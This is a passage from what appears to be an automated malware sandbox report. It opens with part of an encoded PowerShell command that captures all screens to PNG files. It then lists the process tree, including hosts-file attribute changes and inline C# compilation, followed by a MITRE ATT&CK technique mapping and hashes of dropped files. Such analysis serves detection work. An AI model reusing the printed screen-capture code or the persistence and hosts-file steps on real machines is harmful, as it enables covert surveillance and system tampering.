QBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:208
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yov5nsms\yov5nsms.cmdline"
    3⤵
    PID:2520
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES49.tmp" "c:\Users\Admin\AppData\Local\Temp\yov5nsms\CSC71CEEFD2B0C44E6A959B82265ABF371F.TMP"
      4⤵
      PID:2512
- C:\Windows\system32\attrib.exe
  attrib -r C:\Windows\System32\drivers\etc\hosts
  2⤵
  - Views/modifies file attributes
  PID:2680
- C:\Windows\system32\attrib.exe
  attrib +r C:\Windows\System32\drivers\etc\hosts
  2⤵
  - Views/modifies file attributes
  PID:2272

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
701e6c2d07c92f98875e1628951af04d

SHA1
b7c8b3bf60a450948146919cbdf9d5b49bee8901

SHA256
85a0e3f494fd2f94dbab52932e1345b13309ecaa6e205d8dfececf1c9e908df2

SHA512
64fe20322e18bf02a8f0475e37999fa20646e18912c1bd2701d2c0193332c368c4cab648576bce80215ef737d747c43640da37250ca44e714d4152f368158035

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c15fc7ae02737d0d3ad4f2661cd36f7a

SHA1
918d61d129d646e60ec5571fddfc191909fd1b00

SHA256
5182c5f7e38cab0d75853eef5a56fece89de82e460c7cbec3c2ebcf1fabab13e

SHA512
3709f600d2d0d1d97cc1c0ec761a8d4dc653d2f463357f729e12f9e99bdef9e67d83328735e239b6d33138c0e1515f19194a5fe0793f05b9ef2cfd3c13b0d9fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES49.tmp

Filesize
1KB

MD5
073af3f6ea2d9923c01ea619c4524d99

SHA1
4aa536f75d5d44231c249f85f9bdc9aeafd631d5

SHA256
c7dc31ecfc3494c944af69c10f90251dcecc96cab1474fa6d32aa7b156d72b42

SHA512
55bc0b9a024ae16322d56be136c112dddf3f07e1f4dbad39771b1c270dcb6c1bdf2a9fea5f600f436269bf2a0b3dd79f4d53c6f409ea1bde916859093b99e59b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gqr0bioa.q1h.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\jUNzNF1dJ0\Display (1).png

Filesize
431KB

MD5
eec9e9bfa6183b07428d644502a9c1a8

SHA1
68c20ace5364c6b2d6f7480f0f788e09edc2451e

SHA256
7772f05fe93895d72a063994f236b8ca1c2ea6a66eff866fcc71e6f749c68d2d

SHA512
353d5d529dea68bd2a60e03ab3096e396e5891499916c4c910688814a003b7d210f94aa35756edff97418baa92df764d5537106bc2b8eb753b46cfeb7a23969c

Download Submit
C:\Users\Admin\AppData\Local\Temp\yov5nsms\yov5nsms.dll

Filesize
4KB

MD5
ac2c66c08c8e1d0560be22ddcf1842c7

SHA1
eea6ce947b921684a5055d422842dc8e1c9eae95

SHA256
e7878676630da8e9b758a399f9b4735e9bb5ce8f958dacbd0b5c629eeffc3a2b

SHA512
c2dd79266d111e61b906dfcbd78cdc1d4adce71dad22c5ca190e912bcb69916e48564d530179d56d91d3c1f2068949e844480118c24697c8c76297500a0ecd21

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe

Filesize
9.5MB

MD5
df00bc36e9b00874ff8f495a29d9f429

SHA1
3f3140a188943673e7b90b819005548042c9b675

SHA256
27e10c80006f2080f85b3b9aff0d165044d1954385ea16d6e48dabaa6a1ec5af

SHA512
c79ce66d9c73e64cc3060437bf9d2f9f3f17067b0e4ebb8b30d4863ec417ad1f95c315810168d34058f82804ca59a1d8f442d81c265e57dc330670025b152f88

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
29637f421cb5eb9a9008b5b091823270

SHA1
8bb0b01ef0035a029c4ba8f6814db41fba1e716a

SHA256
d3925354d35ce50360d165ece7ab2d44ee49a7aaac7f297ad8f2192249432a46

SHA512
08a1efeaf082525439af8abfb117d3473ab23da5a4db276bdb49eb4a62db8ae2e14e6333c897753a22855a3c45beb413c3eafc98c2a46142c75297ce4d563665

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\yov5nsms\CSC71CEEFD2B0C44E6A959B82265ABF371F.TMP

Filesize
652B

MD5
ad6051b69d5b0d6e320e3ef7d260d9e8

SHA1
120a188cc5fdb578eef7a2f5889238a6f4383731

SHA256
916df697100ba37771ae58f8bc70d3168351a1e427e6e418db35c52c1fe2a00b

SHA512
705b718d197c4187c590571936d8c5db8d47c1ca3cba104fe6458a62fea33e148faa403c57e3e1d8ea3547b093fca793903c948e2a973936359949ad38b77646

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\yov5nsms\yov5nsms.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\yov5nsms\yov5nsms.cmdline

Filesize
607B

MD5
3c73d3208ee3c22e1c4e333f396a3bed

SHA1
fd3aeceedb73863af8ef29b6eae3516f1ca1b80b

SHA256
57c560462621e56e6ed32fe008815561de582658ae6f6045dc9aa442f920034c

SHA512
0f9ef9684773da6321b63e9fa590d28b593471b6b19f5ff1f0278172d63accdcd3e07a66cd775a100838707fc8c035df65fc204381f4499066a345ce74270307

Download Submit
memory/208-181-0x0000016B5A7A0000-0x0000016B5A7A8000-memory.dmp

Filesize
32KB

Download
memory/2740-12-0x000001AADEE00000-0x000001AADEE76000-memory.dmp

Filesize
472KB

Download
memory/2740-7-0x000001AADEAF0000-0x000001AADEB12000-memory.dmp

Filesize
136KB

Download